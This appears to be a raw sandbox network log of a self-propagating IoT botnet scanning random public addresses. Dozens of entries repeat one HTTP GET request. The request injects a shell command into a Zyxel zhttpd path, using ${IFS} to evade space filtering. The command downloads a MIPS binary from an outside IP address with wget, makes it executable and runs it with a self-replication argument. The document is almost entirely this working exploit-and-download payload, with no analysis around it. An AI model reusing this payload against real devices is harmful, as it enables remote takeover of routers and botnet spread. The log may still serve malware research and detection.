                                            Jan 14, 2024 15:50:49.630357981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7148192.168.2.234171036.238.160.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630373955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7149192.168.2.2344562153.212.248.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630393028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7150192.168.2.235788897.223.156.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630429029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7151192.168.2.233618468.79.195.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630467892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7152192.168.2.2341510219.177.184.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630497932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7153192.168.2.233983068.72.155.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630516052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7154192.168.2.2344738184.2.148.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630537033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7155192.168.2.2340330167.17.247.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630551100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7156192.168.2.235712080.109.202.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630563974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7157192.168.2.234112284.202.132.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630611897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7158192.168.2.2359178217.75.243.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630618095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7159192.168.2.234921044.252.210.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630649090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7160192.168.2.2359458124.8.249.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630666018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7161192.168.2.234639081.100.128.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630690098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7162192.168.2.236098463.10.169.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630737066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7163192.168.2.235682667.74.181.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630764961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7164192.168.2.2350200220.121.137.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630815029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7165192.168.2.2340728143.12.213.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630856991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7166192.168.2.2348924173.237.66.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630868912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7167192.168.2.2333352156.141.233.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630882978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7168192.168.2.23521261.136.59.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630903006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7169192.168.2.2353848108.165.219.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.633829117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7170192.168.2.234389488.60.213.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.633847952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7171192.168.2.234940094.96.150.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.633900881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7172192.168.2.2349984106.164.234.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.633939028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7173192.168.2.2351260106.185.129.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.633986950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7174192.168.2.2358920192.84.58.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634030104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7175192.168.2.235533814.180.193.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634067059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7176192.168.2.2358050137.248.172.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634110928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7177192.168.2.2354738140.88.234.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634130001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7178192.168.2.2343264105.75.164.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634166002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7179192.168.2.2337292128.195.78.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634205103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7180192.168.2.2345664131.196.230.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634248972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7181192.168.2.2341418153.199.239.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634267092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7182192.168.2.2339288112.188.100.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634290934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7183192.168.2.236082453.185.69.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634340048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7184192.168.2.233475474.141.228.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634386063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7185192.168.2.2351322158.160.251.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634393930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7186192.168.2.233864649.68.18.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634417057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7187192.168.2.234538836.86.109.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634449005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7188192.168.2.2350882194.133.232.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634502888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7189192.168.2.233357860.240.220.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634532928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7190192.168.2.234923257.15.230.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634552002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7191192.168.2.2341798155.23.52.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634586096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7192192.168.2.235397466.31.107.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634627104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7193192.168.2.2355304133.211.109.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634634972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7194192.168.2.2346522136.30.127.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634656906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7195192.168.2.2336812117.21.13.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634713888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7196192.168.2.235487280.94.228.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634742975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7197192.168.2.2338854141.160.138.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.634814978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7198192.168.2.2360654148.160.16.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.640778065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7199192.168.2.2334352131.118.117.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.640803099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7200192.168.2.234153423.119.172.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.640820980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7201192.168.2.2343582150.83.55.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.640851021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7202192.168.2.2346952129.138.226.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.640903950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7203192.168.2.233376812.83.134.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.640903950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7204192.168.2.2341748165.244.169.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.640965939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7205192.168.2.2353306107.154.29.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.640997887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7206192.168.2.233351223.190.197.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641000032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7207192.168.2.2333890105.26.218.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641017914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7208192.168.2.2336522113.248.55.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641074896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7209192.168.2.233362883.90.243.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.641119957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7210192.168.2.2337112211.158.17.204443
                                            TimestampBytes transferredDirectionData
